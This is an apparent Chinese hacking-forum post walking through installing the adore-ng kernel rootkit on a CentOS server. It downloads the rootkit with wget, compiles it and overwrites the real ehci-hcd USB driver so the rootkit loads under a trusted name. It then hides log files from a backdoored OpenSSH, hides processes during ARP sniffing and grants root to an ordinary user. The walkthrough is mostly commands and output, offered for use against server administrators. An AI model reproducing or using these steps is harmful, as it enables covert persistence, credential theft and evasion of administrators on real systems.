切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
365 内核级别 lkm adore-ng[复制链接]
发表于 2012-12-2 01:20:14 | 显示全部楼层 |!read_mode!

微观:

http://baike.baidu.com/view/2014768.htm

http://baike.baidu.com/view/573460.htm

先下载

  1. [root@Centos tmp]# wget http://lucky.fuzzexp.org/file/r00tk1t/adore-ng-0.56.zip
  2. [root@Centos tmp]# unzip adore-ng-0.56.zip
  3. [root@Centos tmp]# cd adore-ng-0.56
复制代码
看内核

  1. [root@Centos adore-ng-0.56]# uname -a
  2. Linux Centos 2.6.18-308.16.1.el5 #1 SMP Tue Oct 2 22:01:37 EDT 2012 i686 i686 i386 GNU/Linux
复制代码
2.6.18的 Makefile.2.6改名为Makefile

  1. [root@Centos adore-ng-0.56]# mv Makefile 2.4
  2. [root@Centos adore-ng-0.56]# mv Makefile.2.6 Makefile
复制代码
开始MAKE LOVE

  1. [root@Centos adore-ng-0.56]# make
  2. cc -DELITE_UID=2618748389U -DELITE_GID=4063569279U -DCURRENT_ADORE=56 -DADORE_KEY=\"fgjgggfd\" -DHIDE ava.c libinvisible.c -o ava
  3. make -C /usr/src/linux SUBDIRS=`pwd` modules
  4. make: *** /usr/src/linux: 没有那个文件或目录。 停止。
  5. make: *** [adore] 错误 2
  6. [root@Centos adore-ng-0.56]#
复制代码

找不到内核

  1. make -C /usr/src/linux SUBDIRS=`pwd` modules
  2. make: *** /usr/src/linux: 没有那个文件或目录。 停止。
复制代码

我的默认内核地址

  1. [root@Centos adore-ng-0.56]# ls /usr/src/kernels/
  2. 2.6.18-308.16.1.el5-i686
  3. [root@Centos adore-ng-0.56]#
复制代码

一个系统可能游很多内核 例如UBUNTU本机的

  1. brk $ ls /usr/src/
  2. linux-headers-3.5.0-18          linux-headers-3.5.0-19-generic
  3. linux-headers-3.5.0-18-generic  nvidia-experimental-310-310.14
  4. linux-headers-3.5.0-19          vboxhost-4.2.4
  5. brk $
复制代码

他是系统更新没清楚了 所以 你选内核的时候 要选择当前的内核 uname -a 查看所以 我的内核位置是:
/usr/src/kernels/2.6.18-308.16.1.el5-i686/
编辑MAKE文件

  1. [root@Centos adore-ng-0.56]# nano Makefile
复制代码

找到
  1. KERNEL_SOURCE=/usr/src/linux
复制代码

替换成
  1. KERNEL_SOURCE=/usr/src/kernels/2.6.18-308.16.1.el5-i686
复制代码

继续MAKE
  1. [root@Centos adore-ng-0.56]# make
  2. make -C /usr/src/kernels/2.6.18-308.16.1.el5-i686 SUBDIRS=`pwd` modules
  3. make[1]: Entering directory `/usr/src/kernels/2.6.18-308.16.1.el5-i686'
  4.   CC [M]  /tmp/adore-ng-0.56/adore-ng-2.6.o
  5. /tmp/adore-ng-0.56/adore-ng-2.6.c: In function ‘adore_proc_readdir’:
  6. /tmp/adore-ng-0.56/adore-ng-2.6.c:234: 警告:传递参数 3 (属于 ‘orig_proc_readdir’)时在不兼容的指针类型间转换
  7. /tmp/adore-ng-0.56/adore-ng-2.6.c: In function ‘adore_opt_readdir’:
  8. /tmp/adore-ng-0.56/adore-ng-2.6.c:295: 警告:传递参数 3 (属于 ‘orig_opt_readdir’)时在不兼容的指针类型间转换
  9. /tmp/adore-ng-0.56/adore-ng-2.6.c: In function ‘adore_root_readdir’:
  10. /tmp/adore-ng-0.56/adore-ng-2.6.c:378: 警告:传递参数 3 (属于 ‘orig_root_readdir’)时在不兼容的指针类型间转换
  11. /tmp/adore-ng-0.56/adore-ng-2.6.c: In function ‘patch_vfs’:
  12. /tmp/adore-ng-0.56/adore-ng-2.6.c:396: 警告:赋值丢弃了指针目标类型的限定
  13. /tmp/adore-ng-0.56/adore-ng-2.6.c: In function ‘unpatch_vfs’:
  14. /tmp/adore-ng-0.56/adore-ng-2.6.c:415: 警告:赋值丢弃了指针目标类型的限定
  15. /tmp/adore-ng-0.56/adore-ng-2.6.c: In function ‘adore_init’:
  16. /tmp/adore-ng-0.56/adore-ng-2.6.c:502: 警告:赋值丢弃了指针目标类型的限定
  17. /tmp/adore-ng-0.56/adore-ng-2.6.c: In function ‘adore_cleanup’:
  18. /tmp/adore-ng-0.56/adore-ng-2.6.c:534: 警告:赋值丢弃了指针目标类型的限定
  19.   Building modules, stage 2.
  20.   MODPOST
  21. WARNING: /tmp/adore-ng-0.56/adore-ng-2.6.o - Section mismatch: reference to .exit.text:cleanup_module from .text between 'adore_lookup' (at offset 0x7be) and 'adore_opt_filldir'
  22.   CC      /tmp/adore-ng-0.56/adore-ng-2.6.mod.o
  23.   LD [M]  /tmp/adore-ng-0.56/adore-ng-2.6.ko
  24. make[1]: Leaving directory `/usr/src/kernels/2.6.18-308.16.1.el5-i686'
  25. [root@Centos adore-ng-0.56]#
复制代码

MAKE出来的KO
  1. [root@Centos adore-ng-0.56]# file adore-ng-2.6.ko
  2. adore-ng-2.6.ko: ELF 32-bit LSB relocatable, Intel 80386, version 1 (SYSV), not stripped
  3. [root@Centos adore-ng-0.56]#
复制代码

下面需要替换
查看系统默认的模块
  1. [root@Centos adore-ng-0.56]# lsmod
  2. Module                  Size  Used by
  3. autofs4                28741  3
  4. hidp                   22977  2
  5. rfcomm                 42457  0
  6. l2cap                  29761  10 hidp,rfcomm
  7. bluetooth              53797  5 hidp,rfcomm,l2cap
  8. lockd                  63209  0
  9. sunrpc                149245  2 lockd
  10. ip_conntrack_netbios_ns     6977  0
  11. ipt_REJECT              9536  1
  12. xt_state                6209  2
  13. ip_conntrack           53409  2 ip_conntrack_netbios_ns,xt_state
  14. nfnetlink              10713  1 ip_conntrack
  15. iptable_filter          7105  1
  16. ip_tables              17029  1 iptable_filter
  17. ip6t_REJECT             9281  1
  18. xt_tcpudp               7105  10
  19. ip6table_filter         6849  1
  20. ip6_tables             18181  1 ip6table_filter
  21. x_tables               17349  6 ipt_REJECT,xt_state,ip_tables,ip6t_REJECT,xt_tcpudp,ip6_tables
  22. ipv6                  272545  17 ip6t_REJECT
  23. xfrm_nalgo             13381  1 ipv6
  24. crypto_api             12609  1 xfrm_nalgo
  25. loop                   18633  0
  26. dm_multipath           27213  0
  27. scsi_dh                12481  1 dm_multipath
  28. video                  21193  0
  29. backlight              10049  1 video
  30. sbs                    18533  0
  31. power_meter            16461  0
  32. hwmon                   7365  1 power_meter
  33. i2c_ec                  9025  1 sbs
  34. dell_wmi                8401  0
  35. wmi                    12137  1 dell_wmi
  36. button                 10705  0
  37. battery                13637  0
  38. asus_acpi              19289  0
  39. ac                      9157  0
  40. lp                     15849  0
  41. sg                     36717  0
  42. snd_intel8x0           35421  0
  43. snd_ac97_codec         93025  1 snd_intel8x0
  44. ac97_bus                6337  1 snd_ac97_codec
  45. snd_seq_dummy           7877  0
  46. snd_seq_oss            32577  0
  47. snd_seq_midi_event     11073  1 snd_seq_oss
  48. snd_seq                49585  5 snd_seq_dummy,snd_seq_oss,snd_seq_midi_event
  49. parport_pc             29669  0
  50. snd_seq_device         11725  3 snd_seq_dummy,snd_seq_oss,snd_seq
  51. parport                37513  2 lp,parport_pc
  52. i2c_piix4              13133  0
  53. snd_pcm_oss            42817  0
  54. ide_cd                 40161  0
  55. snd_mixer_oss          19009  1 snd_pcm_oss
  56. e1000                 120285  0
  57. snd_pcm                72133  3 snd_intel8x0,snd_ac97_codec,snd_pcm_oss
  58. i2c_core               24896  2 i2c_ec,i2c_piix4
  59. serio_raw              10693  0
  60. tpm_tis                16713  0
  61. snd_timer              24517  2 snd_seq,snd_pcm
  62. pcspkr                  7105  0
  63. snd                    55877  9 snd_intel8x0,snd_ac97_codec,snd_seq_oss,snd_seq,snd_seq_device,snd_pcm_oss,snd_mixer_oss,snd_pcm,snd_timer
  64. tpm                    19041  1 tpm_tis
  65. soundcore              11553  1 snd
  66. tpm_bios               11073  1 tpm
  67. snd_page_alloc         14281  2 snd_intel8x0,snd_pcm
  68. cdrom                  36577  1 ide_cd
  69. dm_raid45              67273  0
  70. dm_message              6977  1 dm_raid45
  71. dm_region_hash         15681  1 dm_raid45
  72. dm_mem_cache            9537  1 dm_raid45
  73. dm_snapshot            23653  0
  74. dm_zero                 6209  0
  75. dm_mirror              24393  0
  76. dm_log                 14785  3 dm_raid45,dm_region_hash,dm_mirror
  77. dm_mod                 63993  11 dm_multipath,dm_raid45,dm_snapshot,dm_zero,dm_mirror,dm_log
  78. ata_piix               24261  0
  79. ahci                   38861  2
  80. libata                156933  2 ata_piix,ahci
  81. sd_mod                 25409  3
  82. scsi_mod              144277  4 scsi_dh,sg,libata,sd_mod
  83. ext3                  125769  2
  84. jbd                    57705  1 ext3
  85. uhci_hcd               25421  0
  86. ohci_hcd               24937  0
  87. ehci_hcd               34509  0
  88. [root@Centos adore-ng-0.56]#
复制代码

最长用的久是声卡 因为LINUX 服务器一般不需要这个东西 什么USB 显卡等等拿系东西别搞
位置在这里
  1. [root@Centos adore-ng-0.56]# modprobe -l | grep ehci
  2. /lib/modules/2.6.18-308.16.1.el5/kernel/drivers/usb/host/ehci-hcd.ko
复制代码

先删除模块
  1. [root@Centos adore-ng-0.56]# modprobe -r ehci-hcd
复制代码

再覆盖模块
  1. [root@Centos adore-ng-0.56]# cp adore-ng-2.6.ko /lib/modules/2.6.18-308.16.1.el5/kernel/drivers/usb/host/ehci-hcd.ko
  2. cp:是否覆盖“/lib/modules/2.6.18-308.16.1.el5/kernel/drivers/usb/host/ehci-hcd.ko”? y
复制代码

加载模块
  1. [root@Centos adore-ng-0.56]# modprobe ehci-hcd
复制代码

检查是否成功
  1. [root@Centos adore-ng-0.56]# ./ava I
  2. Checking for adore  0.12 or higher ...
  3. Adore 1.56 installed. Good luck.

  4. ELITE_UID: 2618748389, ELITE_GID=4063569279, ADORE_KEY=fgjgggfd CURRENT_ADORE=56
  5. [root@Centos adore-ng-0.56]#
复制代码

###########################
#查看空闲模块命令
#lsmod | sort -r -k 3 | tail -5
#请谨慎使用
###########################
下面久能使用这个ROOTKIT
查看帮助
  1. [root@Centos adore-ng-0.56]# ./ava
  2. Usage: ./ava {h,u,r,R,i,v,U} [file or PID]

  3.        I print info (secret UID etc)
  4.        h hide file
  5.        u unhide file
  6.        r execute as root
  7.        R remove PID forever
  8.        U uninstall adore
  9.        i make PID invisible
  10.        v make PID visible

  11. [root@Centos adore-ng-0.56]#
复制代码

隐藏文件 吧刚才OPENSSH的日志记录隐藏了
  1. [root@Centos adore-ng-0.56]# ./ava h /tmp/ilog
  2. Checking for adore  0.12 or higher ...
  3. Adore 1.56 installed. Good luck.
  4. File '/tmp/ilog' is now hidden.
  5. [root@Centos adore-ng-0.56]# ./ava h /tmp/olog
  6. Checking for adore  0.12 or higher ...
  7. Adore 1.56 installed. Good luck.
  8. File '/tmp/olog' is now hidden.
复制代码

查看
  1. [root@Centos adore-ng-0.56]# ls -ls /tmp/
  2. 总计 988
  3.   8 drwxr-xr-x 4 root root   4096 11-22 10:40 adore-ng-0.56
  4. 52 -rw-r--r-- 1 root root  48250 11-13 04:36 adore-ng-0.56.zip
  5. 20 drwxr-xr-x 6 1000 1000  16384 11-22 10:03 openssh-4.3p2
  6. 908 -rw-r--r-- 1 root root 920186 2007-07-24 openssh_4.3p2.orig.tar.gz
  7. [root@Centos adore-ng-0.56]#
复制代码

木游了隐藏进程
当进行ETTERCAP ARP的时候 要进行很多天 必须隐藏的 管理不是傻逼 一个TOP或者PS就能看见例如这个进程
  1. root      1705     1  0 10:33 ?        00:00:00 syslogd -m 0
复制代码

隐藏他
  1. [root@Centos adore-ng-0.56]# ./ava i 1705
  2. Checking for adore  0.12 or higher ...
  3. Adore 1.56 installed. Good luck.
  4. Made PID 1705 invisible.
复制代码

查看还在不
  1. [root@Centos adore-ng-0.56]# ps -ef | grep 1705
  2. root      2549  2331  0 10:50 pts/0    00:00:00 grep 1705
  3. [root@Centos adore-ng-0.56]#
复制代码

用户 一个普通ID
  1. [root@Centos adore-ng-0.56]# useradd helen
  2. [root@Centos adore-ng-0.56]# passwd helen
  3. Changing password for user helen.
  4. New UNIX password:
  5. BAD PASSWORD: it is WAY too short
  6. Retype new UNIX password:
  7. passwd: all authentication tokens updated successfully.
  8. [root@Centos adore-ng-0.56]#
复制代码

登入
  1. brk $ ssh helen@5.5.5.6
  2. helen@5.5.5.6's password:
  3. [helen@Centos ~]$
复制代码

获得ROOT
  1. [helen@Centos adore-ng-0.56]$ ./ava r /bin/bash
  2. Checking for adore  0.12 or higher ...
  3. Adore 1.56 installed. Good luck.
  4. [root@Centos adore-ng-0.56]#
复制代码

查看用户
  1. [root@Centos adore-ng-0.56]# w
  2. 11:01:04 up 28 min,  3 users,  load average: 0.13, 0.20, 0.13
  3. USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
  4. root     tty1     -                10:34   26:58   0.01s  0.01s -bash
  5. root     pts/0    5.5.5.1          10:34    1:36   0.00s   ?    -
  6. helen    pts/1    5.5.5.1          10:59    0.00s  0.01s  0.00s sshd: helen [pr
  7. [root@Centos adore-ng-0.56]#
复制代码

非ROOT登录哦 但是是ROOT权限



操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-12-3 02:08

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部